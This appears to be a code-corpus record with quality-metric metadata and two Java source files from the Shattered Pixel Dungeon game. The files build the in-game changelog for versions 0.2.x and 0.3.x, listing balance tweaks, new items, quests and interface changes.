"qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00115587, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.00845411, "qsc_codejava_score_lines_no_logic": 0.04830918, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 1, "qsc_code_frac_chars_string_length": 1, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_3_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.ChangesScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import com.watabou.noosa.Image;
import java.util.ArrayList;
public class v0_3_X_Changes {
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo( "v0.3.X", true, "");
changes.hardlight( Window.TITLE_COLOR);
changeInfos.add(changes);
add_v0_3_5_Changes(changeInfos);
add_v0_3_4_Changes(changeInfos);
add_v0_3_3_Changes(changeInfos);
add_v0_3_2_Changes(changeInfos);
add_v0_3_1_Changes(changeInfos);
add_v0_3_0_Changes(changeInfos);
}
public static void add_v0_3_5_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.3.5", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released May 1st, 2016\n" +
"_-_ 81 days after Shattered v0.3.4\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.WARRIOR, 0, 15, 12, 15), "Warrior Rework!",
"Warrior Rework:\n" +
"_-_ Starting STR down to 10, from 11\n" +
"_-_ Short sword dmg down to 1-10, from 1-12\n" +
"_-_ Short sword can no longer be reforged\n" +
"_-_ Now IDs potions of health, not STR\n" +
"_-_ Now starts with a unique seal for armor\n" +
"_-_ Seal grants shielding ontop of health\n" +
"_-_ Seal allows for one upgrade transfer"));
changes.addButton( new ChangeButton(new Image(Assets.WARRIOR, 0, 90, 12, 15), "Warrior Subclass Rework!",
"Berserker Rework:\n" +
"_-_ Bonus damage now scales with lost HP, instead of a flat 50% at 50% hp\n" +
"_-_ Berserker can now endure through death for a short time, with caveats\n" +
"\n" +
"Gladiator Rework:\n" +
"_-_ Combo no longer grants bonus damage\n" +
"_-_ Combo is now easier to stack\n" +
"_-_ Combo now unlocks special finisher moves"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Balance Tweaks:\n" +
"_-_ Spears can now reach enemies 1 tile away\n" +
"_-_ Wand of Blast Wave now pushes bosses less\n" +
"\n" +
"Misc:\n" +
"_-_ Can now examine multiple things in one tile\n" +
"_-_ Pixelated font now available for cyrillic languages\n" +
"_-_ Added Hungarian language"));
}
public static void add_v0_3_4_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.3.4", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released February 10th, 2016\n" +
"_-_ 54 days after Shattered v0.3.3\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(Icons.get(Icons.LANGS), "Translations!",
"Shattered Pixel Dungeon now supports multiple languages, thanks to a new community translation project!\n\n" +
"The Following languages are supported at release:\n" +
"_-_ English\n" +
"_-_ Russian\n" +
"_-_ Korean\n" +
"_-_ Chinese\n" +
"_-_ Portugese\n" +
"_-_ German\n" +
"_-_ French\n" +
"_-_ Italian\n" +
"_-_ Polish\n" +
"_-_ Spanish"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Completely redesigned the text rendering system to support none-english characters\n\n" +
"New text system renders using either the default system font, or the original pixelated game font. None-latin languages must use system font.\n\n" +
"Balance Changes:\n" +
"_-_ Hunger now builds ~10% slower\n" +
"_-_ Sad Ghost no longer gives tier 1 loot\n" +
"_-_ Sad Ghost gives tier 4/5 loot less often\n" +
"_-_ Burning now deals less damage at low HP\n" +
"_-_ Weakness no longer discharges wands\n" +
"_-_ Rockfall traps rebalanced"));
}
public static void add_v0_3_3_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.3.3", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released December 18th, 2015\n" +
"_-_ 44 days after Shattered v0.3.2\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), "Google Play Games",
"Added support for Google Play Games in the Google Play version:\n\n" +
"- Badges can now sync across devices\n" +
"- Five Google Play Achievements added\n" +
"- Rankings sync will come in future\n\n" +
"Shattered remains a 100% offline game if Google Play Games is not enabled"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Gameplay Changes:\n" +
"- Tengu's maze is now different each time\n" +
"- Items no longer auto-pickup when enemies are near\n" +
"\n" +
"Fixes:\n" +
"- Fixed several bugs with prison enemies\n" +
"- Fixed some landscape window size issues\n" +
"- Fixed other minor bugs\n" +
"\n" +
"Misc:\n" +
"- Added support for reverse landscape\n" +
"- Added a small holiday treat ;)\n" +
"- Thieves now disappear when they get away"));
}
public static void add_v0_3_2_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.3.2", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released November 4th, 2015\n" +
"_-_ 79 days after Shattered v0.3.1\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.TENGU, 0, 0, 14, 16), "Prison Rework",
"_-_ Tengu boss fight completely redone\n" +
"_-_ Corpse dust quest overhauled\n" +
"_-_ Rotberry quest overhauled\n" +
"_-_ NEW elemental embers quest\n" +
"_-_ NEW prison mob: insane prison guards!\n" +
"_-_ Thieves can escape with a stolen item\n" +
"_-_ Gnoll shaman attack speed increased"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.MASTERY, null), "Balance Changes",
"_-_ Mastery Book now always at floor 10, even when unlocked\n" +
"_-_ Hunger damage now increases with hero level, starts lower\n" +
"\n" +
"Sewers rebalance: \n" +
"_-_ Marsupial rat dmg and evasion reduced\n" +
"_-_ Gnoll scout accuracy reduced\n" +
"_-_ Sewer crabs less likely to spawn on floor 3, grant more exp\n" +
"_-_ Fly swarms rebalanced, moved to the sewers\n" +
"_-_ Great Crab HP reduced \n" +
"_-_ Goo fight rebalanced \n" +
" \n" +
"Base Class Changes: \n" +
"_-_ Mage's staff base damage increased \n" +
"_-_ Huntress now starts with 20 hp \n" +
"_-_ Huntress no longer heals more from dew \n" +
"_-_ Rogue's cloak of shadows now drains less while invisible\n" +
" \n" +
"Subclass Changes: \n" +
"_-_ Berserker now starts raging at 50% hp (up from 40%) \n" +
"_-_ Warden now heals 2 extra HP from dew \n" +
"_-_ Warlock completely overhauled"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Visual improvements from 1.9.1 source\n" +
"_-_ Improved golden UI for donators\n" +
"_-_ Fixed 'white line' graphical artifacts\n" +
"_-_ Floor locking now pauses all passive effects, not just hunger\n" +
"_-_ Cursed chains now only cripple, do not root\n" +
"_-_ Warping trap rebalanced, much less harsh\n" +
"_-_ Various other bugfixes"));
}
public static void add_v0_3_1_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.3.1", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released August 17th, 2015\n" +
"_-_ 83 days after Shattered v0.3.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.TERRAIN_FEATURES, 112, 96, 16, 16), "Trap Overhaul",
"_-_ Over 20 new traps + tweaks to existing ones\n" +
"_-_ Trap visuals overhauled\n" +
"_-_ Traps now get trickier deeper in the dungeon\n" +
"_-_ Trap room reworked to make use of new traps"));
changes.addButton( new ChangeButton(new Image(Assets.MENU, 15, 0, 16, 15), "Interface Improvements",
"_-_ Adjusted display scaling\n" +
"_-_ Search and Examine merged into one button (double tap to search)\n" +
"_-_ New max of 4 Quickslots!\n" +
"_-_ Multiple toolbar modes for large display and landscape users\n" +
"_-_ Ability to flip toolbar and indicators (left-handed mode)\n" +
"_-_ Better settings menu\n" +
"_-_ Graphics settings are now accessible ingame\n" +
"_-_ More consistent text rendering\n" +
"_-_ Recent changes can now be viewed from the title screen\n" +
"_-_ Added a health bar for bosses"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"Balance changes:\n" +
"_-_ Ethereal chains now gain less charge the more charges they have\n" +
"_-_ Staff of regrowth grants more herbal healing\n" +
"_-_ Monks now disarm less randomly, but not less frequently\n" +
"_-_ Invisibility potion effect now lasts for 20 turns, up from 15\n\n" +
"QOL improvements:\n" +
"_-_ Quickslots now autotarget enemies\n" +
"_-_ Resting now works while hungry & at max HP\n" +
"_-_ Dew drops no longer collect when at full health with no dew vial\n" +
"_-_ Items now stay visible in the fog of war\n" +
"_-_ Added a visual hint to weak floor rooms\n" +
"_-_ Many bugfixes"));
}
public static void add_v0_3_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.3.0", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released May 26th, 2015\n" +
"_-_ 253 days after Shattered v0.2.0\n" +
"_-_ 92 days after Shattered v0.2.4\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.MAGE, 0, 15, 12, 15), "Mage Rework!",
"_-_ No longer starts with knuckledusters or a wand\n" +
"_-_ Can no longer equip wands\n" +
"_-_ Now starts with a unique mages staff, empowered with magic missile to start.\n\n" +
"_-_ Battlemage reworked, staff now deals bonus effects when used as a melee weapon.\n\n" +
"_-_ Warlock reworked, gains more health and fullness from gaining exp, but food no longer restores hunger."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.WAND_DISINTEGRATION, null), "Wand Rework!",
"Removed Wands:\n" +
"Flock, Blink, Teleportation, Avalanche\n" +
"\n" +
"Reworked Wands:\n" +
"Magic Missile, Lightning, Disintegration,\n" +
"Fireblast (was Firebolt), Venom (was Poison),\n" +
"Frost (was Slowing), Corruption (was Amok),\n" +
"Blast Wave (was Telekinesis), Regrowth\n" +
"\n" +
"New Wands:\n" +
"Prismatic Light, Transfusion\n" +
"\n" +
"_-_ Wand types are now known by default.\n" +
"_-_ Wands now each have unique sprites.\n" +
"_-_ Wands now cap at 10 charges instead of 9\n" +
"_-_ Wands now recharge faster the more charges are missing.\n" +
"_-_ Self-targeting with wands is no longer possible.\n" +
"_-_ Wand recharge effects now give charge over time.\n" +
"_-_ Wands can now be cursed!"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"New Artifacts:\n" +
"_-_ Ethereal Chains (replaces wand of blink)\n" +
"_-_ Lloyd's Beacon (replaces wand of teleportation)\n" +
"\n" +
"Misc. Balance changes:\n" +
"_-_ Blessed Ankhs now revive at 1/4hp, but also grant initiative.\n" +
"_-_ Alchemist's Toolkit removed (will be reworked)\n" +
"_-_ Chalice of blood nerfed, now regens less hp at high levels.\n" +
"_-_ Cape of Thorns buffed, now absorbs all damage, but only deflects adjacent attacks.\n" +
"_-_ Sandals of nature adjusted, now give more seeds, less dew.\n" +
"_-_ Hunger no longer increases while fighting bosses.\n" +
"_-_ Floor 1 now spawns 10 rats, exactly enough to level up.\n" +
"_-_ Scrolls of recharging and mirror image now more common.\n" +
"_-_ Mimics are now less common, stronger, & give better loot.\n" +
"\n" +
"UI tweaks:\n" +
"_-_ New app icon!\n" +
"_-_ Shading added to main game interface\n" +
"_-_ Buffs now have descriptions, tap their icons!\n" +
"_-_ Visual indicator added for surprising enemies"));
}
}
| 14,422 | v0_3_X_Changes | java | en | java | code | {"qsc_code_num_words": 1957, "qsc_code_num_chars": 14422.0, "qsc_code_mean_word_length": 4.88400613, "qsc_code_frac_words_unique": 0.3111906, "qsc_code_frac_chars_top_2grams": 0.00544047, "qsc_code_frac_chars_top_3grams": 0.043733, "qsc_code_frac_chars_top_4grams": 0.07135384, "qsc_code_frac_chars_dupe_5grams": 0.34975936, "qsc_code_frac_chars_dupe_6grams": 0.29619167, "qsc_code_frac_chars_dupe_7grams": 0.27673153, "qsc_code_frac_chars_dupe_8grams": 0.25340029, "qsc_code_frac_chars_dupe_9grams": 0.24733208, "qsc_code_frac_chars_dupe_10grams": 0.23435865, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02064438, "qsc_code_frac_chars_whitespace": 0.19726806, "qsc_code_size_file_byte": 14422.0, "qsc_code_num_lines": 323.0, "qsc_code_num_chars_line_max": 154.0, "qsc_code_num_chars_line_mean": 44.6501548, "qsc_code_frac_chars_alphabet": 0.80495811, "qsc_code_frac_chars_comments": 0.05408404, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.19402985, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.01865672, "qsc_code_frac_chars_string_length": 0.56743879, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.0261194, "qsc_codejava_score_lines_no_logic": 0.06343284, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/ui/changelist/v0_2_X_Changes.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.ui.changelist;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.items.Honeypot;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.HornOfPlenty;
import com.shatteredpixel.shatteredpixeldungeon.items.artifacts.TimekeepersHourglass;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.scenes.ChangesScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSprite;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.ui.Icons;
import com.shatteredpixel.shatteredpixeldungeon.ui.Window;
import com.watabou.noosa.Image;
import java.util.ArrayList;
public class v0_2_X_Changes {
public static void addAllChanges( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo( "v0.2.X", true, "");
changes.hardlight( Window.TITLE_COLOR);
changeInfos.add(changes);
add_v0_2_4_Changes(changeInfos);
add_v0_2_3_Changes(changeInfos);
add_v0_2_2_Changes(changeInfos);
add_v0_2_1_Changes(changeInfos);
add_v0_2_0_Changes(changeInfos);
changes = new ChangeInfo(" ", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
}
public static void add_v0_2_4_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.2.4", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released February 23rd, 2015\n" +
"_-_ 48 days after Shattered v0.2.3\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(new Honeypot()), "Pixel Dungeon v1.7.5",
"v1.7.3 - v1.7.5 Source Implemented, with exceptions:\n" +
"_-_ Degredation not implemented.\n\n" +
"_-_ Badge syncing not implemented.\n\n" +
"_-_ Scroll of Weapon Upgrade renamed to Magical Infusion, works on armor.\n\n" +
"_-_ Scroll of Enchantment not implemented, Arcane stylus has not been removed.\n\n" +
"_-_ Honey pots now shatter in a new item: shattered honeypot. A bee will defend its shattered pot to the death against anything that gets near.\n\n" +
"_-_ Bombs have been reworked/nerfed: they explode after a delay, no longer stun, deal more damage at the center of the blast, affect the world (destroy items, blow up other bombs)."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.BANDOLIER, null), "New Content",
"_-_ The huntress has been buffed: starts with Potion of Mind Vision identified, now benefits from strength on melee attacks, and has a chance to reclaim a single used ranged weapon from each defeated enemy.\n\n" +
"_-_ A new container: The Potion Bandolier! Potions can now shatter from frost, but the bandolier can protect them.\n\n" +
"_-_ Shops now stock a much greater variety of items, some item prices have been rebalanced.\n\n" +
"_-_ Added Merchant's Beacon.\n\n" +
"_-_ Added initials for IDed scrolls/potions."));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Going down stairs no longer increases hunger, going up still does.\n\n" +
"_-_ Many, many bugfixes.\n" +
"_-_ Some UI improvements.\n" +
"_-_ Ingame audio quality improved.\n" +
"_-_ Unstable spellbook buffed.\n" +
"_-_ Psionic blasts deal less self-damage.\n" +
"_-_ Potions of liquid flame affect a 3x3 grid."));
}
public static void add_v0_2_3_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.2.3", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released January 6th, 2015\n" +
"_-_ 64 days after Shattered v0.2.2\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(new TimekeepersHourglass()), "Artifact Changes",
"Added 4 new artifacts:\n" +
"_-_ Alchemist's Toolkit\n" +
"_-_ Unstable Spellbook\n" +
"_-_ Timekeeper's Hourglass\n" +
"_-_ Dried Rose\n\n" +
"_-_ Artifacts are now unique over each run\n" +
"_-_ Artifacts can now be cursed!\n" +
"_-_ Cloak of Shadows is now exclusive to the rogue\n" +
"_-_ Smaller Balance Changes and QOL improvements to almost every artifact"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.POTION_CRIMSON, null), "Balance Changes",
"_-_ Health potion farming has been nerfed from all sources\n" +
"_-_ Freerunner now moves at very high speeds when invisible\n" +
"_-_ Ring of Force buffed significantly\n" +
"_-_ Ring of Evasion reworked again\n" +
"_-_ Improved the effects of some blandfruit types\n" +
"_-_ Using throwing weapons now cancels stealth"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"_-_ Implemented a donation system in the Google Play version of Shattered\n\n" +
"_-_ Significantly increased the stability of the save system\n\n" +
"_-_ Increased the number of visible rankings to 11 from 6\n\n" +
"_-_ Improved how the player is interrupted by harmful events"));
}
public static void add_v0_2_2_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.2.2", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released November 3rd, 2014\n" +
"_-_ 21 days after Shattered v0.2.1\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.STONE_AUGMENTATION, null), "Pixel Dungeon v1.7.2",
"Implemented directly from v1.7.2:\n" +
"_-_ Synchronous Movement\n" +
"_-_ Challenges\n" +
"_-_ UI improvements\n" +
"_-_ Vertigo debuff\n\n" +
"Implement with changes:\n" +
"_-_ Weightstone: Increases either speed or damage, at the cost of the other, instead of increasing either speed or accuracy.\n\n" +
"Not Implemented:\n" +
"_-_ Key ring and unstackable keys\n" +
"_-_ Blindweed has not been removed"));
changes.addButton( new ChangeButton(new Image(Assets.TERRAIN_FEATURES, 112, 112, 16, 16), "New Plants",
"Added two new plants:\n" +
"_-_ Stormvine, which brews into levitation\n" +
"_-_ Dreamfoil, which brews into purity\n\n" +
"_-_ Potion of levitation can now be thrown to make a cloud of confusion gas\n\n" +
"_-_ Removed gas collision logic, gasses can now stack without limitation."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.REMAINS, null), "Heroes Remains",
"Heroes remains have been significantly adjusted to prevent strategies that exploit them, but also to increase their average loot.\n\n" +
"Remains have additional limitations:\n" +
"_-_ Heros will no longer drop remains if they have obtained the amulet of yendor, or die 5 or more floors above the deepest floor they have reached\n" +
"_-_ Class exclusive items can no longer appear in remains\n" +
"_-_ Items found in remains are now more harshly level-capped\n" +
"_-_ Remains are not dropped, and cannot be found, when challenges are enabled.\n\n" +
"However:\n" +
"_-_ Remains can now contain useful items from the inventory, not just equipped items.\n" +
"_-_ Remains are now less likely to contain gold."));
}
public static void add_v0_2_1_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.2.1", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released October 13th, 2014\n" +
"_-_ 28 days after Shattered v0.2.0\n" +
"\n" +
"Dev commentary will be added here in the future."));
changes.addButton( new ChangeButton(new Image(Assets.GHOST, 0, 0, 14, 15), "New Sewer Quests",
"_-_ Removed the dried rose quest (the rose will return...)\n\n" +
"_-_ Tweaked the mechanics of the fetid rat quest\n\n" +
"_-_ Added a gnoll trickster quest\n\n" +
"_-_ Added a great crab quest"));
changes.addButton( new ChangeButton(new Image(Assets.GOO, 43, 3, 14, 11), "Goo Changes",
"Goo's animations have been overhauled, including a particle effect for the area of its pumped up attack.\n\n" +
"Goo's arena has been updated to give more room to maneuver, and to be more variable."));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.GUIDE_PAGE, null), "Story & Signpost Changes",
"Most text in the sewers has been overhauled, including descriptions, quest dialogues, signposts, and story scrolls"));
}
public static void add_v0_2_0_Changes( ArrayList<ChangeInfo> changeInfos ){
ChangeInfo changes = new ChangeInfo("v0.2.0", false, "");
changes.hardlight(Window.TITLE_COLOR);
changeInfos.add(changes);
changes.addButton( new ChangeButton(Icons.get(Icons.SHPX), "Developer Commentary",
"_-_ Released September 15th, 2014\n" +
"_-_ 31 days after Shattered v0.1.1"));
changes.addButton( new ChangeButton(new ItemSprite(new HornOfPlenty()), "Artifacts!",
"Added artifacts to the game!\n\n" +
"Artifacts are unique items which offer new gameplay opportunities and grow stronger through unique means.\n\n" +
"Removed 7 Rings... And Replaced them with 7 Artifacts!\n" +
"_-_ Ring of Shadows becomes Cloak of Shadows\n" +
"_-_ Ring of Satiety becomes Horn of Plenty\n" +
"_-_ Ring of Mending becomes Chalice of Blood\n" +
"_-_ Ring of Thorns becomes Cape of Thorns\n" +
"_-_ Ring of Haggler becomes Master Thieves' Armband\n" +
"_-_ Ring of Naturalism becomes Sandals of Nature"));
changes.addButton( new ChangeButton(new ItemSprite(ItemSpriteSheet.RING_DIAMOND, null), "New Rings!",
"To replace the lost rings, 6 new rings have been added:\n" +
"_-_ Ring of Force\n" +
"_-_ Ring of Furor\n" +
"_-_ Ring of Might\n" +
"_-_ Ring of Tenacity\n" +
"_-_ Ring of Sharpshooting\n" +
"_-_ Ring of Wealth\n\n" +
"The 4 remaining rings have also been tweaked or reworked entirely:\n" +
"_-_ Ring of Accuracy\n" +
"_-_ Ring of Elements\n" +
"_-_ Ring of Evasion\n" +
"_-_ Ring of Haste"));
changes.addButton( new ChangeButton(Icons.get(Icons.PREFS), Messages.get(ChangesScene.class, "misc"),
"-Nerfed farming health potions from fly swarms.\n\n" +
"-Buffed crazed bandit and his drops.\n\n" +
"-Made Blandfruit more common.\n\n" +
"-Nerfed Assassin bonus damage slightly, to balance with him having an artifact now.\n\n" +
"-Added a welcome page!"));
}
}
